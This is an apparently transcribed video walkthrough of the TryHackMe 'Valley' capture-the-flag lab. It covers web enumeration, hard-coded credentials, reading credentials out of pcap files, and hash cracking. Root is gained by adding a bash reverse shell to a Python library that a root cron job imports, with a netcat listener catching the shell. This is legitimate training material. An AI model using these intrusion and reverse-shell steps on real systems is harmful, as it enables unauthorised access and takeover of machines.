Hello, welcome back to CTF Walkthroughs. I'm your host, Callie Surfer, and today we're going to go right back into the TryHackMe challenge rated easy. This is the one titled Valley. I started my first live streaming yesterday and only completed about half of this challenge, so I wanted to make the full walkthrough video for you so you can see the final steps towards gaining the root flag. So without further ado, let's get into it.
Listen closely.
All right, so we are up and running now. We had to refresh our VPN before we could really dive into this box. But I already did a quick Nmap scan, and here are our results. We're walking port 80 over here on the left. There are a couple of links. Looks like a photo gallery. This is kind of an interesting directory there. Let's just make note of that. Could be some interesting files and stuff hidden there. Let's see, return home. We've got a whole bunch of images. Looks like it goes up to 18. Right off the bat, let's see if there's a 19. Static 19, and there's not. How about a 1? There should be. Yep. Is there a 0? No. How about a 00? And there's a note here. So we could have also discovered this through brute forcing if we used, like zap or burp or anything that brute forces, like Hydra we could also do, or fuzz, fuff. Those are all different tools you could try. But here we have some notes. It looks like there could be a hidden directory. And then check for seam alerts. That's kind of a curious thing. But let's copy this whole note into our own notes. And then we'll explore this folder in a bit more depth. But let's run a Dirbusting scan just on the side as we continue going, and we can look back at this later on. Oh, it had the HTTP. Okay. All right, we'll let that roll in the background. And let's go ahead to this directory and see what we can find. Got the whole note there. Oh, okay. We see a login portal and something flashed for a minute, so I'm going to check the source code. Nope. Nothing strange there. Okay, let's go ahead and boot up Zap. And we'll take a look and see what other pages might be hiding on this HTTP server. We don't need to persist. If you haven't used Zap proxy before, you should check it out. It's totally free. It can do pretty much all of the basic stuff that Burp Suite can do, but there's no speed throttling, so you can really blaze through directory busting and brute force attacks and stuff like that. We don't need to update right now. Whoops. We do want to open it. Zap. Ah, here it is. It's still open down here. All right. We don't need the new version yet. So let's go to Manual Explorer, and we don't need the hood. Let's launch our browser. Okay, so this will be hooked up to our VPN. And you can see if you click on history, it automatically kind of keeps track of every page that it accesses. You'll have to excuse my voice. I'm still getting over a little cold. So I'll try not to talk too much today. But here we are on the page in our burp browser, and we're starting to get some hits back here. Right, so we can see some pages we didn't know were there. A style.css. We can open that. So we can just, there's got to be here. Open URL in browser. Open it in Firefox. And we should see the code for the CSS. Yeah, so nothing really interesting there. What if we go to View Gallery? What happens? So we're starting to get some hits here. Okay, nothing surprising yet. And it automatically creates alerts. So there's one medium flag that came back. That's kind of interesting. Let's view the pricing. Return home. Just clicking around everywhere I see. What's this medium flag? I want to know about that. Let's look at our alerts tab. Okay. Not sure. Nothing really jumps out at me there. Okay. Let's go to our secret page now. And copy that address from our notes. Here it is. Ah. Cut and paste still doesn't work there. But we got to it through, what was it, static 00. And here it is. So we can now navigate to the login portal. And there were a few hits there. There's a style CSS, a button, and a dev. The dev sounds the most interesting. Let's open that up. Open it in Firefox. Oh, and yeah, I almost missed the possible username that we also learned from that note. Is it Valley Dev or Dev Valley? Something along those lines. And yeah, let me make my face smaller so you can actually see what we're doing. Okay, put myself up there for a little while. And looks like we've got a bit of a freeze on the VM. So we may need to give it just a minute to work this out. Yeah, we got a freeze. Okay, we're back. Good. Sometimes the VMs do that. They kind of hiccup. Okay, let's take a look at that other page that we found in there. What was it? There's a style.css. And, oh yeah, we could look at the source code from the login. Did we do that yet? We did. Let's look at the style.css. Oh. Nothing there. What was the other one? Looks like our zap crashed, actually. So let's reboot the zap. Okay. And we'll go, yeah, we don't need to open the browser this time. Actually, maybe we do. Yeah, I think we do, since we're not spidering. Okay, but we should get all the hits we need over here. Let's go back one degree. There we go, dev.js. There's a button.js. Let's take a look at that. Okay, doesn't look special. Style.css. Did we look at that one already? I think we did. Rectangle. Yep. Yeah, no hidden notes or code in there. Style. Let's look again at the dev.js. Oh, so here's something. There's a dev notes text, and there's also a hard-coded username and password. It looks like this portal doesn't actually send a post request. It just goes to this page, which verifies the username password combination. So we can skip ahead now to the devnotes.txt file, but let's take notes first here on the interesting code, and then we'll grab this address and let's drop it in up here. Okay, more notes here. Stop reusing credentials, so that's probably a clue that we're going to have to continue to recycle credentials that we find out. Stay up to date on patching and change FTP port to normal port. So there must be a non-standard port. Let's see, I've got 2 VPNs open. All right, let's go back and do a full Nmap scan now. .11, no, 113, 187. Okay, we can see what that non-standard port is. Patching, so there could be something missing, a patch on a vulnerability. All right, so good so far. Let's update our notes a little bit more. So we'll just put clues, 1, non-standard FTP port, 2, reuse creds. Okay, speaking of credentials, we've got siemDev and password California. And then we've got, is it Valley Dev? I think that was it. We got that from our first hidden note, which is up here. Yeah, Valley Dev. So that could be a username. So we've got a login. We have the second note. And we have some credentials. So we could try now SSHing our way in. And we want to check also on that Dirb scan. Nothing surprising there. This is still working. Very close to being done with the stealth scan portion. Let's see if our credentials work on SSH while we're waiting. valleydev at 10.10.113.187, and the password is California. Does it work? It doesn't work. Okay, well, it was worth a shot. Let's see what else we can figure out while we're waiting. Oh, there we go, and there it is. This is going to be our FTP service running on a non-standard port. We'll put that in our notes. Okay. So now we can try and enumerate that FTP service. All right, so we'll open this window. Let's call it FTP. And we're going to go in as Valley. Actually, let's see if we can go in as anonymous first. And this is going to be on port 37370. Connected. Our name is anonymous. Password. I just put enter for no password. Login failed. Let's try it again. FTP. This time we'll say we're valleydev. And our password is California. Incorrect. Oh. Well, we have another username. Siem, right? What was that called? siemDev, California. Oh, I just remembered it wrong. Say login, user, siemDev, password, California. Sweet, so we are in. Now we found 3 files. Let's git star to grab all of them. Yes to everything. And yes. And we've got some pcapping files, which are going to be data records of different swaps going on through the network, and they've been captured and documented here. We can use Wireshark to examine the packets more carefully and look for any plain text or things that we can decrypt. Okay, so let's boot up Wireshark. And we have 3 files. So let's open the first one. And where were we? We are, okay, we're just in the root, the home directory. All right, so it should be here. Yep. Let's check the FTP one first. So I'll try to provide you some hints and tips on how we can sort through this area. User anonymous, pass anonymous. That might have been me. Not sure. We can check our properties and see. So this does come from today, it looks like. Or no, it's March 6th, actually. March 6th of 23. So that was a long time ago. So let's sort through and see, is there anything interesting here? There's some kind of list here. That could be interesting. So one thing you can do in Wireshark is right click and then go to follow, and you can choose the stream and then it will, sometimes it'll display it in plain text in a more easily readable format. So I'm just going to cut and paste this list into our notes because it's possible it'll come into play later. Just say found in FTP pcap file, and we found a list. Right? Okay. Let's just save that in case we crash. And back to our sorting. Let's go to our next file. We don't want to dig too deep because we could just be digging into a rabbit hole. Let's open up HTTP 1 and we'll sort through. We can delete that filter. We don't want any filters right now. Wireshark does some color coding for us, so we can scan for interesting findings. Down here, there's a button for expert information, and these are packet entries with with errors, which may indicate interesting information. Let's see about this first one here. Packet 58. Connection reset. Okay. Don't see anything really surprising there. But we can do Control F, I think it is, or is it Control G? Control G to go straight to a packet. So let's go to packet 58. And okay, nothing much to see there. Wait, here's something. Keep connection alive. So let's follow this one. We can right click. Okay. ASPX.net. ASP.net rather. Okay, looks like just a normal message. Let's go to our next file. And Wireshark is a little bit frozen here. Okay, we may have to wait a second for that. All right, let's close out from Wireshark and let's jump into our home directory and grab that last file. Here it is, 2. And on this one, search through. We can use a filter if it works. Well, still seems a little frozen. But the protocol is an interesting thing. So there are 2,825 packets. That's a lot of data to sort through. But one thing we can look for is like a keyword, like user. Let's say matches user. What else could we do? Host. Let's see. Let's search for HTTP. So there are some things here in green. Let's see if we can get to a stream that's interesting and follow it down the pipe. And Wireshark, I've learned, shows you all the layers of the OSI model. So if you aren't familiar with that, Wireshark will help you to understand it at a deeper level. We can do this one, http.request.method equals post. Okay, so we do have, there's one post here. And now we can right click, good, follow the TCP stream, and we can see the whole bit here dumped out. So it's important to read every line carefully. And here we go, here's something interesting. Right here, Valley Dev and PSW, maybe password equals photos 1234. So we have more credentials here that we have uncovered. Let's jot those down. So in our creds section, we want to put down Valley Dev, and the password would be photos 1234. Right? Shift : WQ for write and quit. But actually I want to jump back in there. And now let's flip over to our SSH service. And let's see if we can get in there now. Just update that IP, 113.187. And the password is photos 1234. Yes, we are in now. I'm going to make myself a little bit bigger here to celebrate. Yes. All right, let's bring that up so you can see it. So let's do some manual enumeration. There's our first flag. Nice. Cali in the valley. Let's make a note about that. So we can make it right here at the bottom. We'll do hashtag flags user.text, and then we're going to want probably a root.text or something like that. So now our task now is privesc, privilege escalation. We need to find a way to get from our current user up to a user that has root access so we can read the flag, or find a way just to directly read the flag without bothering to switch users. So at this point, we could run a Linpeas shell script to automatically enumerate the whole system. But I think we should poke around a little more first and see what we can find out. Okay, no strange groups. Let's see if we can do a sudo tac l photos. We may not run sudo. Okay, let's go back a step. Oh, okay, so we have two other users. There's the siemDev and Valley. And then there's a file here, Valley Authenticator. So let's SCP this back to our machine. Or we can, actually, let's try running a strings command on it. Authenticator. And, okay, no strings. So there's no strings here. Let's do what I said before, an SCP. Let's see if we have that. We do. Good. SCP Valley Authenticator. And we'll send it back to our machine, which is what? Cali. Wait, no. Actually, we are root at see. I think it's / and then we want to do home and THM and then Valley walkthrough, and we'll put it right there. Cannot create regular file. Maybe I do need that colon. Let's put that back. And then we'll put a dot there. And should ask for my password. But it's not asking. That's weird. Okay, we can background that. Let's check our directory just to see if anything, probably nothing came through, but you never know. Dirb is still working away there. Nmap. Okay. All right, back to our FTP box here. Valley walkthrough. Okay, nothing came through. Let's see if we can do it this way. We're siemDev, right? Or ValleyDev. We're ValleyDev. ValleyDev at, and what's our IP? Let me get rid of Wireshark here, since we're done sharking for now. And Firefox seems to be a little messed up. I find that Firefox often kind of freezes on this VM. Okay, so that's our address, and we're going to bring over from our home directory Valley Authenticator. Home Valley Authenticator, and we'll bring it right here. It is photos 1, 2, 3, 4. Okay, so SCP is secure shell copy and uses the SSH protocol to exfiltrate data, in this case, our file, Valley Authenticator. Now we're running on Kali. We already have strings binary ready to go. What this does is it'll look through all of the data in the binary, and then it will extract anything that can be a string of text that's readable to us without any conversion or cracking or anything like that, decrypting. So we'll run it on Valley Authenticator, and it comes back with a really long line of stuff. See if, oh, there's something. Personalities adjusted. So there are some bits and pieces here of actual text. The longer lines usually are of interest, or often can be of interest. So I can just scan through visually and see what might be hiding here, if anything. I don't know how many lines we have, but let's take a look at just the top. Huh. Okay. All right, so let's try using grep to pick out lines. So we'll pipe that to a grep, and see what we can do here. All right, just going to check on one command for using our grep. Cool. So the site I was looking for is right here. It's this one, Explain Shell. This is really sweet. If you're into syntax, if you're a geek about language and usage on computers, this is really cool because you can quickly understand each little weird flag and argument that's added to a command like strings. So we're going to do this, and this comes from someone else's walkthrough. So I do check walkthroughs and read through them. When I get stuck, I like to read just to the point where I get the tiny hint I need to continue, and then I keep challenging myself. This walkthrough, it's from hacklido.com, and so in his walkthrough, he chose to use grep here with these commands. So the tac I, first off, let's see, tac I goes down to here, ignore case. Ignore case distinctions in both the pattern and the input file. So it'll get things with capitals and lowercase. It'll get all of them. And then the tac B here, oh, so pass kind of is like the first part of password, so it might bring something up. Then there's a tac B and a tac A. Let's see, tac B, lines leading context before matching lines. Okay, so it sounds like there needs to be quite a bit of string stuff going on for it to grep it with this argument. So let's put it in now. I pass. Let's try that first. Oh, so it did grab that. And now I see why we want the B and the A. We want to get some lead in and some lead out, right? So we can see it in context. And there is some junk up here. So let's take that junk and move it over to Crackstation. This is a site that has pre-cracked hash databases that can quickly show you if it can be found through cracking. And you don't have to waste time and energy on doing the cracking. Crackstation.net. I don't know why, but my browser is just not cooperating today. So I'm going to close it and we'll start fresh. Whoops. We don't want to close our whole virtual machine. Okay, let's try opening a new Firefox. And Crackstation. And now let's see if we can drop in. It's still messed up. Okay, this isn't too unusual. Let's save our notes. Okay, and then we'll just do a reboot. So our VM will be back up and running in not too long. Move myself over here. So I'm using VirtualBox for running Kali. All right, so now let's jump back in. Hopefully Firefox cooperates now. I think I might need to upgrade it. Room, and we were doing Valley. All right, we need to connect up again to our VPN. Okay, and then our box is still going. Cool. So first up, let's get back into our directory. And we'll vim our notes. Okay, let's SSH back. Let's see. Yeah, we were doing the Crackstation bit. So let me grab those strings again. This is our VPN. And right, so strings, and we'll get that bit here, the chunk of longer text, which probably is going to be of interest. And we'll take it over to Crackstation, drop our lines in. Cool, Firefox is working now. Cars. Watch me do CAPTCHAs. Hey, I can identify cars. That's a car. That's a car. Bus. Checking my bus knowledge. I'm good on buses. Crack 'em. And that first line. So that was hashed. Liberty 123. Let's add that to our notes. So we have a new password. We don't know what the username is. Whoop. There we go. Okay, we don't know what the username is yet, but you remember when we were in there on SSH, we saw that there was another user. So let's SSH in as ValleyDev, and he's Liberty 123, I think. No. He was Liberty 123, no, that's what we just found. Photos 1234. And let's go back a step. Remember when we looked at the users, there was also a username Valley. So let's try to switch users now with SU Valley, and we'll type in Liberty 123. And we're in. So we just did a lateral move over to another lower level user. Let's look in their home. And there is an interesting directory there. There's some data, the data files. I don't know what those are, but they're of size 0, so probably they're good for nothing. And I'm not quite sure what this one is here either. Let's look in our desktop. So they do have standard folders, so we should just check all of them. Documents, downloads. music, pictures, public, templates, videos. Okay, at this point, I'm not finding anything except these data files. Let's see if we can run some Linpeas. So we'll bring Linpeas over to do some automatic enumeration. So I'm going to split my terminal now. And back on my Kali, let me go into transfer. Okay, so I've got a transfer directory going here. I already have my linpeas.shell script. You can grab that from the GitHub latest binaries section. But for now, let's just throw up a simple Python server. And then over here, we'll use wget to grab it from our attack box on quad 5s. Okay. And it's trying. It's trying, but not succeeding. Not sure why it's failing on that, but we can use a different method. Let's use scp valley at what's that address again? Right here. And we'll put it in home valley. We'll stick it right there. And then we also need the name of the file, which is linpeas.shell. It'll ask for the password. And there it goes. Hopefully. Yep. So we scp'd it over. Should be right there. We have to chmod to change to give ourselves execute privileges on Linpeas, and then we'll run it with the ./Linpeas. It'll take a while and it'll spit out all kinds of stuff, most likely. But we can kind of read it as it's getting spit out here. See if it can find any interesting files or permissions or known vulnerabilities on the machine. It's taking its sweet time here today. I'll move my head out of the way. Yeah, and we can X this out now. Collapse subterminal. Okay. Cool. So now here we go. We're getting junk. So there are a few possible vulnerabilities. See what else. EC2 credentials. Okay, so there's some signs of AWS. These are processes running. Cron jobs, those are tasks that run on a timeline. So like there's a backup script here running. Well, that's an example. See what else. Any internal services running? Doesn't look like it. There's our FTP port, the non-standard one. Root. These are all of our users. It can really find a lot out from an underprivileged user. All right. No home runs yet. User.txt, we already saw that. Bash history. Old.js. That could be interesting. There's the 00 where we got our original note from the dev. Let's see. Here's something. Home Valley Authenticator. Group Valley Admin. And it's running these two things under it. Base64.py. All right, let's break here and go back on over to the target. Well, we're in the target box. That's right. Okay, so let's investigate. Let's go back out. Let's check our temp while we're here. Okay, not sure if any of that is useful. How about in the opt? No. In our home directory, okay, so there's where we have this Valley Authenticator. We were able to pull a string out of there and use Crackstation. And we got those credentials. Let's see if we can run it. Username. Valley. Liberty. 123. Authenticated. Huh, I wonder if that did anything. So let's look in Valley's home again. I feel like I missed something here. Okay, let's go back to our Linpeas. We'll start from the bottom this time. The color coding really helps. We can check our cron jobs too. Cat, etc, cron tab. And here's something interesting. Root is running a Python script. It's in a photos file. So let's LSLA that to see. So root owns it. We have execute permissions and read permissions. Let's cat that file. Let's see if we can edit the file now. We'll use nano. I don't think this machine has Vim installed. And yep, we can't write on it. So we can't modify and save this file. Let's exit. No. And what we can do though is we can find the base64 file. We'll say which base64 to locate that file. And let's LSLA the base64 file. And we have execute and read. Or yeah, I think execute and read. Let's just verify that we don't have write permissions. All right, they don't have Vim. Oop, okay. We want to get out of here. Control X to get out. Whoops, Control X to get out. Don't save. User bin base64. Okay. If we could get into the base64 and write on it, we could add a line to spawn a revshell. Maybe Valley Dev has permissions. Valley admin. Let's try changing user to the Valley admin. Because we're in the Valley admins group. It's unwritable. Okay. Exit out of there. Control X, no. Valley Dev. We haven't been into the siemDev yet, have we? Let's see if we can switch users to him. And we'll try out credentials, because remember we made a note that we want to reuse credentials. So we'll just try all of these passwords. We can try California, see if that works. Oh, and it worked. Okay, cool. So we have some more enumeration to do now. There's an FTP directory. And, oh, there are the pcapping files. So we could drop more files in here if we wanted to. Let's check our ID. And let's check and see if we can modify that user bin base64 file. No. We can't. All right, let's take a peek at another write-up real quick. We'll check MadFox. So, what's the final move here? base64.py, they seem to have found a different py file, which base64.py. Oh. It doesn't like my question. Which base64.py? Okay, we'll use the full find command. So find tac type f for file, tac name, base64.py, and then we'll send errors to a dev null. And there we found the file. So Python libraries, I guess, load up files that end with .py. That makes sense. Let's check permissions on this first. The other base64 that we were looking at was probably for the general system, not for Python. And here, so here's where it is. Valley admin is able to do anything they want because they own this file. So let's see if we can nano it now. And we can. It still says it's unwritable, and that's probably because we changed users. So let's exit. Let's switch users back to Valley Dev or Valley Admin. Oh. So this is some kind of weird shell. It doesn't have all the commands. Let's see if we can stabilize it real quick. And then maybe we can flip over to Valley Admin. So Valley Admin. Oh, I think that's the name of the group, actually. So we want to switch user to Valley Dev. And we were photos 1, 2, 3, 4, I think. Yep. Okay, now we want to use nano and drop into that file. Oh, still saying unwritable. Check again. Valley admin ID. Okay, let's switch over to Valley ID. Here we go. So this user Valley is in the Valley admin group, so they have permissions to well, they own the file. They can modify it as they like. So now it should work if we go over to the file. Yep. And so no warning came up here. We should be able to import OS now. And then we can spawn a reverse shell with Python 3. And let me just check the syntax here. Right, okay, here it is. So for this script, we're using the OS library to spawn our revshell. So we can use this one, os.system bash command, and then single apostrophe there, bash tac I, and dev tcp 10, 6, 2, 23, 4, 4, 3, 0, and 1. And then we also need, we need the apostrophe first, then the quotations, then the parenthesis. If any of those are off, it won't work. So now we'll write out with Control O. We're good to go. So now all we need to do is start our netcat listener. So let's split the terminal again. We'll do vertically, and I think we used 443 on that. So if we wait about a minute, we should catch our root shell, because that script on the cron tabs is running every minute, and it loads up the base64.py library, and we just changed it to spawn a shell to our attack machine on port 443. So we'll see if it works. Right. Just be patient here for a minute. This is a long minute. I don't know. Let's see. Sometimes you get a shell that's so broken that you just have to check with a command to see if it's actually there. Let's check on that cron tab again. See how often does it run. So every minute of every hour, yeah, it should be running every 60 seconds if I'm reading this correctly. I feel like it's been 60. Let's cat that script again and check it over for mistakes. So back at the top, ten, 6, 223. Dev TCP (443) should work. But nothing's coming yet. We could try running the script, but I think that would change it to us getting a shell as valley. Let's try it though. So we want to run the Python script, right? So Python 3, who's in photos, script, photosEncrypt.py. So we ran it and nothing happened. Maybe port 443 is blocked. It's possible. So let's change it to quad 4s. And we'll jump into that script again and update it. Oh, I see what I did actually. It should work. I reversed these commands by accident. It should be system.os, not os.system. Let's back it out. Go back to 443. Control O to save, enter, Control X to exit, and now we should get it within 60 seconds. Who am I? Who am I? Who am I? Am I root? Who am I? Am I root? Who am I? Let's try running the script. I'm too impatient to wait. Name system is not defined. Okay. We're getting this. Okay. Maybe I have to import system also. Import OS. Let me import system as well. Whoops. No module named system. All right. We have a problem here. Okay, let's go back to my other idea. Oh no, our terminal is messed up. Let's get out of here. Okay, we'll exit out of there. Let's come back over. Clear that terminal. Let's nano here. And let's take that system off again. I think it's a submodule of OS, so I actually did have the command correct here. And we're back on 443. Okay. Oh, I know what I'm doing. I'm running base 64, but I should be running the photos script, right? So Python 3 photos. Whoops, didn't mean to go into Python 3. Photos. Script. Okay, so we're running photosEncrypt right now. let's make sure our machine is still running. It is. But I see that our IP has changed. All right, so when I get in a situation like this, it's not because I'm making mistakes, it's because something with the setup of the VPN and the VM running is messed up. So let's do a complete restart here. We'll go to our VPN. Whoop, close that out by accident. Okay. So we're going to start back from here. Yep, still the wrong IP address. That works. Photos 1, 2, 3, 4. Now we should be able to switch users to Valley. Liberty 1, 2, 3. Yep. Now let's split our terminal. Actions split. Okay, we'll create a netcat listener on 443. Let's find which base64.py. Oh, okay. Base64.py. Right, we want to do find, starting at the root, we'll use type f name 64.py dev null. Good. Okay, nano. I'm going to go into there. Okay, cool. We've got our shell there. We just need to update our IP. There it is. So we have a new IP because we changed servers. So let's add that into here. Huh. And that terminal seems to have gone. Oh man, that terminal died. Our VPN looks good to go. Man. So close, but so far. Huh. Having trouble with the SSH today. Don't know why. Okay. Let's open up a new one. Let's try SSHing in again as Valley Dev. Password is Then we'll switch user to Valley. Password is Liberty123. Then we're going to nano user bin Python 3.8, and we're going to get base 64.py. Okay, my path was probably incorrect there. Okay, we'll find that guy. And let's see if we can finish this up real quick. Okay. Here we go. All right, now we're talking. We can edit now. We should be able to update that IP. 10.2.90. 10.2.90.163. Okay, I'm going to save that. Exit. And now we should catch it. We should catch it any minute now. There we are. So who am I? We're root. We caught it. And let's just cat out the root.txt file. And it's hanging. I don't know why it's hanging. We're so close. We're really close. All right. Let's see if we can one more time get in there. Oh, we got it. I don't know why it took so long, but here it is. That's our root flag. So we'll copy it over to our notes. And there we go. We just finished up this box. Thank you for joining me. Today's walkthrough was a lot of fun. There were a lot of hang-ups and little things that we had to deal with, so I hope you learned something from it. It can be a messy process at times, but it's always fun in the end when you get to those flags. You feel that rush of adrenaline and I don't know what else, but it feels great to be done, and we'll see you next time. Bye.